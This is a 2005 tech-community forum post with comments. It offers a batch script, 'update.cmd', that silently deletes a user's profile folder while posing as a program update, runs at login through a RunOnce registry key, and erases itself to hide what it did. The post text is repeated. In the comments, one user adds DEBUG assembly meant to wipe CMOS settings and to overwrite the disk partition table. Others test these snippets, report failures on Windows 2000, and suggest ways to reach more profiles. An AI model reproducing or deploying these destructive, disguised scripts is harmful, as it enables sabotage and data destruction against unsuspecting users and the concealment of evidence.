"It's called destroying the evidence!"
Mar. 31st, 2005 03:48 pm![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
jecook posting in ![[community profile]](https://www.dreamwidth.org/img/silk/identity/community.png){kind=small}
techrecoveryBecause a few people asked for it.
!!!WARNING!!! This script deletes data without the possibility of easy recovery. No warrenty provided. Use at your own risk, I'm not responsible for your stupidity. Keep limbs inside ride at all time. Do not taunt HappyFunBall. The Computer is your Friend.
To run it on login, you'll need to add a registry entry pointing to the batch file in:
Hkey\Users\[sid]\Software\Microsoft\Windows\Runonce
create a new String Value, call it whatever you want, and put the path to the batch file in for the data. It'll run once (like the reg key states) and be removed afterwards. Seeing as program install updates this way sometimes, It's a useful thing to exploit.
Look under HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\ProfileList and find the Administrator account to match the SID to user.
Of course, the profile has to already exist first... ;)
For domain situations, you'd be best advised to park it under the domain administrator, if you have access to it. Otherwise, local Administrator will do fine. It's pretty obvious what it does. It also deletes itself after it's done... ::snicker::
It runs under the guise of "Updating files", which some programs actaully spawn a DOS window to do.
Removing the "pause command (or commenting it out) removes the wimp option.
"update.cmd"
---
@ Echo off
@echo Ready to Update Files.
pause
@echo Updating... Please wait...
c:
cd \
cd "Documents and Settings"
rmdir /s /q username
@ Echo Update Complete.
cd [wherever you created the file. I'd recommend parking it somewhere under a directory]
erase update.cmd
!!!WARNING!!! This script deletes data without the possibility of easy recovery. No warrenty provided. Use at your own risk, I'm not responsible for your stupidity. Keep limbs inside ride at all time. Do not taunt HappyFunBall. The Computer is your Friend.
To run it on login, you'll need to add a registry entry pointing to the batch file in:
Hkey\Users\[sid]\Software\Microsoft\Windows\Runonce
create a new String Value, call it whatever you want, and put the path to the batch file in for the data. It'll run once (like the reg key states) and be removed afterwards. Seeing as program install updates this way sometimes, It's a useful thing to exploit.
Look under HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\ProfileList and find the Administrator account to match the SID to user.
Of course, the profile has to already exist first... ;)
For domain situations, you'd be best advised to park it under the domain administrator, if you have access to it. Otherwise, local Administrator will do fine. It's pretty obvious what it does. It also deletes itself after it's done... ::snicker::
It runs under the guise of "Updating files", which some programs actaully spawn a DOS window to do.
Removing the "pause command (or commenting it out) removes the wimp option.
"update.cmd"
---
@ Echo off
@echo Ready to Update Files.
pause
@echo Updating... Please wait...
c:
cd \
cd "Documents and Settings"
rmdir /s /q username
@ Echo Update Complete.
cd [wherever you created the file. I'd recommend parking it somewhere under a directory]
erase update.cmd
![[identity profile]](https://www.dreamwidth.org/img/silk/identity/openid.png){kind=small}
no subject
Date: 2005-04-01 09:49 am (UTC)no subject
Date: 2005-04-01 01:46 pm (UTC)A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
Note: Nothing is typed on this line
G
Q
Or, here's one I call "The Nuke". It erases partition tables:
A:\>debug
-F 200 L1000 0
-A CS:100
xxxx:0100 MOV AX,301
xxxx:0103 MOV BX,200
xxxx:0106 MOV CX,1
xxxx:0109 MOV DX,80
(80 for hd 0 or 81 for hd 1 )
xxxx:010C INT 13
xxxx:010E INT 20
xxxx:0110
-g
Program terminated normally
-q
Have fun, kids.
no subject
Date: 2005-04-01 04:26 pm (UTC)The first one claims to run successfully, but has no effect. OUT is a privileged instructions on modern x86 machines, so I'd have expected it to die with the 16-bit equivalent of an illegal instruction exception.
The second one gives the following:
"An application has attempted to directly access the hard disk, which cannot be supported. This may cause the application to function incorrectly. Chose 'Close' to terminate the application."
These were tested under Win2k, as both a normal user and as an administrator.
no subject
Date: 2005-04-01 04:58 pm (UTC)no subject
Date: 2005-04-01 05:35 pm (UTC)If you mean the "Debug Programs" priv, then yes, that is switched on for the admin accounts.
no subject
Date: 2005-04-01 05:41 pm (UTC)And yeah, I meant the Debug Programs user right under security policies, which often _isn't_ set for anyone by default.
Will it work for you if you give yourself the "Act as part of the operating system" right?
no subject
Date: 2005-04-01 06:23 pm (UTC)I just granted that priv to the local Administrator, and tried them both again - same results.
Personally, I'm suprised it works for you at all - direct access to the hardware is supposed to be blocked for anything not running in kernel mode, which should rule out the first one... and the INT instructions in the second should trap to NT anyway, which again should block it.
no subject
Date: 2005-04-01 06:32 pm (UTC)no subject
Date: 2005-04-01 04:00 pm (UTC)no subject
Date: 2005-04-01 04:59 pm (UTC)no subject
Date: 2005-04-01 06:17 pm (UTC)no subject
Date: 2005-04-12 01:54 am (UTC)A very very few folks may not have their profiles stored on c:...if you checked for the %userprofile% path, that would catch the clever folks, too.
Erm. In theory.